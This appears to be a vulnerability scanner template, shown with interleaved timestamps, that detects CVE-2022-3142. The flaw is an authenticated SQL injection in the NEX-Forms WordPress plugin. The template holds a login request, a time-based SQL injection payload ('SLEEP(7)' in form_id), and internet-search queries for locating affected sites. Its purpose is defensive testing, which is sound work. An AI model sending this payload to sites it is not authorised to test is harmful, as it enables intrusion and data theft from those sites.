2023-10-17 07:20:28 +00:00
id : CVE-2022-3142
info :
name : NEX-Forms Plugin < 7.9.7 - SQL Injection
author : r3Y3r53
severity : high
description : |
The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.
remediation : Fixed in version 7.9.7
reference :
- https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/
- https://www.exploit-db.com/exploits/51042
- https://nvd.nist.gov/vuln/detail/CVE-2022-3142
2023-10-17 17:52:26 +00:00
- http://packetstormsecurity.com/files/171477/WordPress-NEX-Forms-SQL-Injection.html
2023-11-08 06:56:05 +00:00
- https://medium.com/%40elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
2023-10-17 07:20:28 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
2023-10-17 17:52:26 +00:00
cve-id : CVE-2022-3142
2023-10-17 07:20:28 +00:00
cwe-id : CWE-89
2024-03-23 09:28:19 +00:00
epss-score : 0.00356
2024-04-08 11:34:33 +00:00
epss-percentile : 0.71515
2023-10-17 07:20:28 +00:00
cpe : cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*
metadata :
verified : true
2023-10-17 17:52:26 +00:00
max-request : 2
vendor : basixonline
product : nex-forms
framework : wordpress
2024-05-31 19:23:20 +00:00
shodan-query : http.html:/wp-content/plugins/nex-forms-express-wp-form-builder/
fofa-query : body=/wp-content/plugins/nex-forms-express-wp-form-builder/
2024-06-07 10:04:29 +00:00
publicwww-query : /wp-content/plugins/nex-forms-express-wp-form-builder/
2024-01-14 09:21:50 +00:00
tags : cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline
2023-10-17 07:20:28 +00:00
http :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout : 30s
2024-02-06 15:37:02 +00:00
GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1
2023-10-17 07:20:28 +00:00
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
2024-02-06 15:37:02 +00:00
- 'duration>=7'
2023-10-17 07:20:28 +00:00
- 'status_code_2 == 200'
- 'contains(body_2, "NEX-Forms")'
- 'contains(content_type_2, "text/html")'
condition : and
2024-06-08 16:02:17 +00:00
# digest: 490a004630440220245e5b5001d840be2c17fae954a218594d722ae697e66478c6b43212bfc792d60220371c3f59d70e529a7d7cd5f8c8bcdab4416be17edcf2b5326bd3b255cb2631aa:922c64590222798bb761d5b6d8e72950